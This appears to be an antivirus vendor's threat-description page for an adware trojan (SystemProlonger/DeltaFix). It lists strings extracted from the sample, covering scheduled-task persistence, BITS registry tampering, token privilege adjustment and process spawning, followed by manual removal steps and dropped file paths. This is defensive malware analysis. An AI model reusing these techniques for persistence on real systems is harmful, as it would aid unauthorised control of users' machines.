AdjustTokenPriv() return: %u (0==success)
E:%u OpProcTkn
(lpCmdLine==NULL)
result=%s
E: empty key; ignored
Except 0x%0.8x @0x%0.8x (%.30s) hmod=0xx
E:%d enc
E OpenPT: %x
E EES: %x
PendingFileRenameOperations
PendingFileRenameOperations2
FileRenameOperations
c:\temp\winnie-pooh\piglet-rules.tmp
DeleteFile('%s') OK (not exist)
DeleteFile('%s') E1:%d;E2:%d
DeleteFile('%s') OK (scheduled; immediate E:%d); pending ops found:%d
DeleteFile('%s') OK
'%.256s~': E:%d
C:\Users
C:\Doc
\qmgr.dll
major version %d looks bogus
minor ver %d looks bogus
s-pack %d looks bogus
E:%d creating Runtime; OS-ver=%d
DLL LogPath='%s'
DL%d_%s
E:%d create HTML document; OS-ver=%d, IE-ver=%s
E:%d bind runtime to HTML window; OS-ver=%d, IE-ver=%s
E:%d LoadScr(BOOT)
E:%d LoadScr(JSO)
FROMAGENT_URLMON_IS_PRIMARY
FROMAGENT_NO_FALLBACK_ON_HTTP_ERRORS
E:%x execScript(JSON)
E:%x execScript(BOOTSTRAP)
execScript(BOOTSTRAP) done; m_eExitCode not set, assumed %d (E_SUCCESS=%d)
execScript(BOOTSTRAP) done; EC:{%d,%d}
execScript(BOOTSTRAP): script ended: VT_%d (VT_INT=%d)
worker about to end - calling spRuntime.Release();
%s-%s
Global\%s
E:%d CreateEvent '%s'
/schedule /profile "%s"
E:%d installing task '%.256s~'
E:%d removing task '%.256s~'
SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
E:%d open BITS registry at '%s'
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): Adjusting BITS FGND retries to %d (in registry)
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): BITS FGND retries (in registry) = %d
Refresh enth set to %d sec
%ds[to-wait]-%ds[since-last];keep>0 ==>%ds
Waiting  %ds
"%s" /%s "%s"
E appdaemon.Start '%.256s~'
%d.%d.%d.d
: E:%d open agent key '%.50s>'
E:%d delete module key '%.256s~'
: InitializeSecurityDescriptor failed; Error %u
: SetSecurityDescriptorDacl failed; Error %u
%s\%s\%s
E:%d open agent key'%.256s~'
WriteRegistryProfile E open module key '%.50s>' E:%d
WriteRegistryProfile E create section key '%.50s>' E:%d
WriteRegistryProfile E write section='%.50s>' value='%.50s>'; E:%d
['%.50s>']('%.50s>')<=='%.50s>'; E:%d; %s
: {sec'%.50s>',key'%.50s>'} E val-len %d>%d truncated
['%.256s~']('%.256s~')='%.256s~'; E %d too long, max=%d
E:%d start worker watchdog
CAgentModule::WatchdogThreadMain: Watchdog active. no event; waiting %d sec
.ini.bak
(%s,%s): E:%d open key
E:%d CoCreateInst
E:%d: ITaskSched::NewWItem
SetApplicationName E:%d
E:%d SetParameters
SetWorkingDirectory E:%d
SetAccountInformation E:%d
SetComment E:%d
SetFlags E:%d
CreateTrigger E:%d
SetTrigger E:%d
SetMaxRunTime E:%d
QueryInterface(IPersistFile) E:%d
E:%d save task in scheduler (IPersistFile::Save)
E:%d activate task (ITask::Run)
CoCreateInstance TaskScheduler failed %d
ITaskScheduler::Delete failed %d
E:%d OpSCMan
OpenService failed %d
ChangeServiceConfig failed %d
E:%d GetUserName
: E:%d LoadUserProfile (hTok=0x%x)
E:%d CreateEnvironmentBlock (hTok=0x%x)
"%s" %s
E:0xx CreateProcessAsUser; cannot start '%.256s~'; attempt CreateProcess
E:0xx CreateProcess; cannot start worker
E:0x%x CreateProcess OK but (hProcess==NULL); cannot start worker
: PHY %dmb<%dmb; E start command'%.256s~'
: VIRT %dmb<%dmb; E start command'%.256s~'
E:0x%0x WTSQUserTken
: E:0x%0x DupToken(Impers); continue;
: E:0x%0x DupToken(Ident); continue;
: E:0x%0x GetTokenInfo; continue;
E:0x%0x ImpersLOU
non admin user, os-ver=%d ==> do not execute
E:%d FndNxtFile: source is a folder
DeleteDirectory('%s') OK
DeleteDirectory('%s') E:%d
RemoveFileTree('%s') OK
RemoveFileTree('%s') E:%d
E:%d '%.256s~'->'%.256s~'
E:%d encrypting; cont unencrypted
E:%d Prepare()
ShellExecuteEx
E:%d (info.hInstance=%d)
Notepad.exe
Software\Microsoft\Windows\Current
ddeexec
.aHTML
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
ddd
%d.%d.0.%d
URLInfoAbout
URLUpdateInfo
C:\Windows\System32\msiexec.exe
PID%d.TID%d
CEventLogger::LogEventV: vsprintf error %d with pszFormat='%s'
E:%d create memlog
{"entry_counter":"%u","entry_time":"%s","entry_type":"%llu","message":"%.256s"},
file not reported
JScr E:'%.50s>' F:'%.30s>',L:%d
E:NULL desc) (F='%.30s>',L=%d)
JScr: ExitP(%d)
JScr: ExitP(no code=%d)
E:%d data='%.256s~'
E:%d GetDisID'%.256s~'
ver=%d.%d.%d(%s)
os_id=%d.%d.%d sp%d
aid=%s
hid=%s (old crc32=0xx)
timestamp now=0x%s
IPv4_long=%d 0xx
E:%d folder '%s'
killed %d '%.256s~'
E:%d copy to '%.256s~'
E:%d ShellExec '%.256s~''%.256s~'
E:%d CreateProc '%.256s~'
E:%d GetExitCodProc(pid=%d)
E:%d inst to '%.256s~'
/instal E not adm. (OSVer=%d)
/install E not admin. (OSVer=%d) Cannot run
/Install <path> E:%d; continue as worker to report
/inst E not admin. (OSVer=%d)
/install E:%d schedule logon task (OSVer=%d); continue as worker to report
/install OK, but uninstaller(this=0x%x) E:%d.
/install OK. (will be reported by self)
/install E:%d. (is reported by parent)
/schedule E not admin. (OSVer=%d) Cannot run
New Scheduler v%d.%d.%d %s
Scheduler exits C:0x%x
/uninstall requires admin privileges. (OSVer=%d) Cannot run
Disable OK; %d killed
UNINST REPORT STARTS
UNINST REPORT ENDS
New Wker v%d.%d.%d %s
Worker exits C:0x%x
E:0x%x create: '%.256s~'
(%s,%s): OK
(%s,%s): E:%d setting value
E:%d open key '%.256s~'
RegDeleteKeyEx






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:1404
    usetup.exe:220
    SystemProlonger.exe:1612
    SystemProlonger.exe:608
    putfu.exe:1320
    rundll32.exe:1676
    rundll32.exe:512
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\down.1404.usetup.exe (25824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x86\regsvr32.exe (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\down.1404.putfu.exe (198289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TsuA22E3355.dll (2569 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\1_1[1].txt (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1_1.ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\BDF51210.dat (16424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\TsuDll.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (15 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.dat (16944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\1[1].txt (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (3312 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_tin1E16.bat (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1.ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\DeltaFix[1].exe (198289 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\52feb8d0a4447f79e3f56fe4a8a588f5.log (1657732 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x64\regsvr32.exe (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\agup[1].exe (25824 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (673 bytes)
    %Documents and Settings%\All Users\Application Data\SnowApp\SystemProlonger\SystemProlonger.exe (26080 bytes)
    %WinDir%\Tasks\SystemProlonger-S-4177913480.job (696 bytes)
    %Documents and Settings%\All Users\Application Data\SnowApp\SystemProlonger\4177913480.ini (36544 bytes)
    %Program Files%\DeltaFix\DeltaFix.dll (260858 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now